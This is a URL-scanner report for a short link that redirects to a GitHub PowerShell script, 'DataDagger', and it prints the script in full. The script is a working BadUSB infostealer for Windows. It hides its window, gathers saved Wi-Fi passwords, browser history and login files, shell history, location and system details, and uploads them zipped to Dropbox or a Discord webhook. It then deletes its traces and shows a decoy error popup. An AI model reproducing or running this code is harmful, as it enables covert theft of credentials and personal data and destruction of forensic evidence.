http://t.ly/Clank.PT
Last Checked: Mar 10, 2024, 20:58 EDT
| IP Address: | 172.67.75.122 |
| ASN #: | AS13335 CLOUDFLARENET, US |
| Location: | Unknown, Unknown, Unknown |
| URL Reputation: |
|
Other submissions on 172.67.75.122:
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/IosicuroNEXI
-
https://t.ly/yxxao
Other submissions on t.ly:
-
https://t.ly/yxxao
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
-
https://t.ly/rH3ag
Previous checks:
No previous checks.
Domain Name: t.ly
Registry Domain ID: 35140-CoCCA
Registry WHOIS Server: whois.nic.ly
Updated Date: 2022-12-10T19:16:57.87Z
Creation Date: 2010-03-01T22:00:00.0Z
Registry Expiry Date: 2028-03-25T22:00:00.0Z
Registrar Registration Expiration Date: 2028-03-25T22:00:00.0Z
Registrar: Libyan Spider Network (int)
Registrar Abuse Contact Email: abuse@register.ly
Registrar Abuse Contact Phone: +1.8448469791
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: QG8A1-cCvEC
Registrant Name: TLY Admin
Registrant Organization: TLY
Registrant Street: PO BOX 13885
Registrant City: Florence
Registrant State/Province: South Carolina
Registrant Postal Code: 29505
Registrant Country: US
Registrant Phone: +84.35983627
Registrant Email: tim@t.ly
Registry Admin ID: 5PTTv-EESDN
Admin Name: TLY Admin
Admin Organization: TLY
Admin Street: PO BOX 13885
Admin City: Florence
Admin State/Province: South Carolina
Admin Country: US
Admin Phone: +84.35983627
Admin Email: support@t.ly
Registry Tech ID: PAWSi-VaJRY
Tech Name: TLY Admin
Tech Organization: TLY
Tech Street: PO BOX 13885
Tech City: Florence
Tech State/Province: South Carolina
Tech Country: US
Tech Phone: +1.8435993628
Tech Email: support@t.ly
Registry Billing ID: gv7Pt-I8Zvx
Billing Name: TLY Admin
Billing Street: PO BOX 13885
Billing City: Florence
Billing State/Province: South Carolina
Billing Country: US
Billing Phone: +84.35983627
Billing Email: support@t.ly
Name Server: ivan.ns.cloudflare.com
Name Server: vida.ns.cloudflare.com
DNSSEC: unsigned
>>> Last update of WHOIS database: 2024-03-11T00:52:00.490Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: You are not authorized to access or query our WHOIS database through the use of electronic processes that are high-volume and automated. This WHOIS database is provided by as a service to the internet community.
The data is for information purposes only. We do not guarantee its accuracy. By submitting a WHOIS query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes. The compilation, repackaging, dissemination or other use of this data is expressly prohibited.
-
GET200 OK
https://raw.githubusercontent.com/ClankPT/Flipper-Zero-BadUSB/main/Payloads/DataDagger/DataDagger.ps1
- http://t.ly/Clank.PT https://t.ly/Clank.PT
- https://t.ly/Clank.PT https://raw.githubusercontent.com/ClankPT/Flipper-Zero-BadUSB/main/Payloads/DataDagger/DataDagger.ps1
<html><head><link rel="stylesheet" href="resource://content-accessible/plaintext.css"></head><body><pre>############################################################################################################################################################
# #
# Nome : DataDagger #
# Autor : Clank #
# Categoria : Recon #
# Alvo : Windows 10,11 #
# #
# | ###### ### ## ## #### #### ### ## ## ### ### | #
# | ## ## ## ### ### ## ## ## ## ## ### ## ## ## | #
# | ## ## ## ####### ## ## ## ## #### ## #### | #
# | ## ## ## ## # ## ## ## ## ## ####### ### | #
# | ## ####### ## ## ## ## ####### ## #### #### | #
# | ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## | #
# | ###### ## ## ### ### #### ####### ## ## ## ## ### ### | #
# #
# Anything can be hacked... or anyone #
# #
#__________________________________________________________________________________________________________________________________________________________#
# #
# Descrição: | ███████▀▀▀░░░░░░░▀▀▀███████ |#
# Este script permite obter detalhes sobre o PC alvo. | ████▀░░░░░░░░░░░░░░░░░▀████ |#
# Detalhes como: palavra passe de redes wi-fi, especificações do computador, todos os processos em execução... | ███│░░░░░░░░░░░░░░░░░░░│███ |#
# Todas as informações adquiridas serão formatadas de maneira organizada e enviadas para um arquivo. | ██▌│░░░░░░░░░░░░░░░░░░░│▐██ |#
# Esse arquivo é enviado para um servidor discord. | ██░└┐░░░░░░░░░░░░░░░░░┌┘░██ |#
# | ██░░└┐░░░░░░░░░░░░░░░┌┘░░██ |#
# Sobre mim: | ██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██ |#
# | ██▌░│██████▌░░░▐██████│░▐██ |#
# | ███░│▐███▀▀░░▄░░▀▀███▌│░███ |#
# | ██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██ |#
# | ██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██ |#
# | ████▄─┘██▌░░░░░░░▐██└─▄████ |#
# | █████░░▐█─┬┬┬┬┬┬┬─█▌░░█████ |#
# | ████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████ |#
# | █████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████ |#
# | ███████▄░░░░░░░░░░░▄███████ |#
# | ██████████▄▄▄▄▄▄▄██████████ |#
# #
# Gitub: ClankPT #
# Discord: .clank_ #
# Steam: Clank.PT # #
############################################################################################################################################################
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
add-type -name win -member $i -namespace native;
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
# Faz uma Pasta chamada LOOT, um ficheiro em txt, e um ZIP
$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)"
$FileName = "$FolderName.txt"
$ZIP = "$FolderName.zip"
New-Item -Path $env:tmp/$FolderName -ItemType Directory
############################################################################################################################################################
# Inserir os tokens pedidos abaixo "dropbox ou discord".
#$db = ""
#$dc = ""
############################################################################################################################################################
# Reconhecimento de todos os diretórios do utilizador
tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
# Histórico da PowerShell
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
############################################################################################################################################################
function Get-fullName {
try {
$fullName = (Get-LocalUser -Name $env:USERNAME).FullName
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fullName = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$email = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GeoLocation = Get-GeoLocation
$GeoLocation = $GeoLocation -split " "
$Lat = $GeoLocation[0].Substring(11) -replace ".$"
$Lon = $GeoLocation[1].Substring(10) -replace ".$"
############################################################################################################################################################
# local-user
$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String
############################################################################################################################################################
Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value }
$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin"
$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop"
$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name
$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name
If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" }
ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" }
Else{ $UAC = "Unknown" }
############################################################################################################################################################
$lsass = Get-Process -Name "lsass"
if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."}
else {$lsass = "LSASS is not running as a protected process."}
############################################################################################################################################################
$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name
############################################################################################################################################################
# Apanha as credenciais de rede wireless
try
{
$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
}
catch
{
$NearbyWifi="No nearby wifi networks detected"
}
############################################################################################################################################################
# Apanha informação sobre o PC
# Apanha o IP / Informação da Rede
try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}
catch{$computerPubIP="Error getting Public IP"}
try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String}
catch{$localIP = "Error getting local IP"}
$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String
# Verifica o RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
$RDP = "RDP is Enabled"
} else {
$RDP = "RDP is NOT enabled"
}
############################################################################################################################################################
#Apanha informações do sistema
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerName = $computerSystem.Name
$computerModel = $computerSystem.Model
$computerManufacturer = $computerSystem.Manufacturer
$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String
$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String
$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String
$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String
$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String
$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String
############################################################################################################################################################
$ScheduledTasks = Get-ScheduledTask
############################################################################################################################################################
$klist = klist sessions
############################################################################################################################################################
$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime
############################################################################################################################################################
# Apanha informações dos discos
$driveType = @{
2="Removable disk "
3="Fixed local disk "
4="Network disk "
5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String
#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250
############################################################################################################################################################
# Apanha a interface da rede
$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250
$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
############################################################################################################################################################
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250
# Cria uma lista dos serviços
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.ProcessName
}
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250
# Serviços
$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250
# software Instalado (Apanha o uninstaller)
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250
# drivers
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250
# Placa Gráfica
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250
############################################################################################################################################################
# Visão Final
$output = @"
############################################################################################################################################################
# #
# Nome : DataDagger #
# Autor : Clank #
# Categoria : Recon #
# Alvo : Windows 10,11 #
# #
# | ###### ### ## ## #### #### ### ## ## ### ### | #
# | ## ## ## ### ### ## ## ## ## ## ### ## ## ## | #
# | ## ## ## ####### ## ## ## ## #### ## #### | #
# | ## ## ## ## # ## ## ## ## ## ####### ### | #
# | ## ####### ## ## ## ## ####### ## #### #### | #
# | ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## | #
# | ###### ## ## ### ### #### ####### ## ## ## ## ### ### | #
# #
# Anything can be hacked... or anyone # #
# #
#__________________________________________________________________________________________________________________________________________________________#
Full Name: $fullName
Email: $email
GeoLocation:
Latitude: $Lat
Longitude: $Lon
------------------------------------------------------------------------------------------------------------------------------
Local Users:
$luser
------------------------------------------------------------------------------------------------------------------------------
UAC State:
$UAC
LSASS State:
$lsass
RDP State:
$RDP
------------------------------------------------------------------------------------------------------------------------------
Public IP:
$computerPubIP
Local IPs:
$localIP
MAC:
$MAC
------------------------------------------------------------------------------------------------------------------------------
Computer Name:
$computerName
Model:
$computerModel
Manufacturer:
$computerManufacturer
BIOS:
$computerBIOS
OS:
$computerOs
CPU:
$computerCpu
Mainboard:
$computerMainboard
Ram Capacity:
$computerRamCapacity
Total installed Ram:
$computerRam
Video Card:
$videocard
------------------------------------------------------------------------------------------------------------------------------
Contents of Start Up Folder:
$StartUp
------------------------------------------------------------------------------------------------------------------------------
Scheduled Tasks:
$ScheduledTasks
------------------------------------------------------------------------------------------------------------------------------
Logon Sessions:
$klist
------------------------------------------------------------------------------------------------------------------------------
Recent Files:
$RecentFiles
------------------------------------------------------------------------------------------------------------------------------
Hard-Drives:
$Hdds
COM Devices:
$COMDevices
------------------------------------------------------------------------------------------------------------------------------
Network Adapters:
$NetworkAdapters
------------------------------------------------------------------------------------------------------------------------------
Nearby Wifi:
$NearbyWifi
Wifi Profiles:
$wifiProfiles
------------------------------------------------------------------------------------------------------------------------------
Process:
$process
------------------------------------------------------------------------------------------------------------------------------
Listeners:
$listener
------------------------------------------------------------------------------------------------------------------------------
Services:
$service
------------------------------------------------------------------------------------------------------------------------------
Installed Software:
$software
------------------------------------------------------------------------------------------------------------------------------
Drivers:
$drivers
------------------------------------------------------------------------------------------------------------------------------
"@
$output > $env:TEMP\$FolderName/computerData.txt
############################################################################################################################################################
function Get-BrowserData {
[CmdletBinding()]
param (
[Parameter (Position=1,Mandatory = $True)]
[string]$Browser,
[Parameter (Position=1,Mandatory = $True)]
[string]$DataType
)
$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"}
elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"}
elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data\Default\History"}
elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE\Appdata\Local\Microsoft\Edge\User Data\Default\Bookmarks"}
elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release-*\places.sqlite"}
elseif ($Browser -eq 'firefox' -and $DataType -eq 'logins' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release-*\logins.json"}
elseif ($Browser -eq 'brave' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\History"}
elseif ($Browser -eq 'brave' -and $DataType -eq 'logins' ) {$Path = "$Env:USERPROFILE\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data"}
$Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} | Sort -Unique
$Value | ForEach-Object {
$Key = $_
if ($Key -match $Search){
New-Object -TypeName PSObject -Property @{
User = $env:UserName
Browser = $Browser
DataType = $DataType
Data = $_
}
}
}
}
Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "firefox" -DataType "logins" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "brave" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
Get-BrowserData -Browser "brave" -DataType "logins" >> $env:TMP\$FolderName\BrowserData.txt
############################################################################################################################################################
Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP
# Upload para a Dropbox
function dropbox {
$TargetFilePath="/$ZIP"
$SourceFilePath="$env:TEMP\$ZIP"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $db
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
if (-not ([string]::IsNullOrEmpty($db))){dropbox}
############################################################################################################################################################
#Upload para o Discord
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = "$dc"
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
############################################################################################################################################################
<#
.NOTES
Agora esta parte é para remover qualquer evidência que prove que o script correu
#>
# Delete nos ficheiros da pasta Temp
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete no histórico do run box
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete no histórico da powershell
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Esvazia a Reciclagem
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
############################################################################################################################################################
# sinal que acabou um Pop-up
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Syntax error",1)
</pre></body></html>
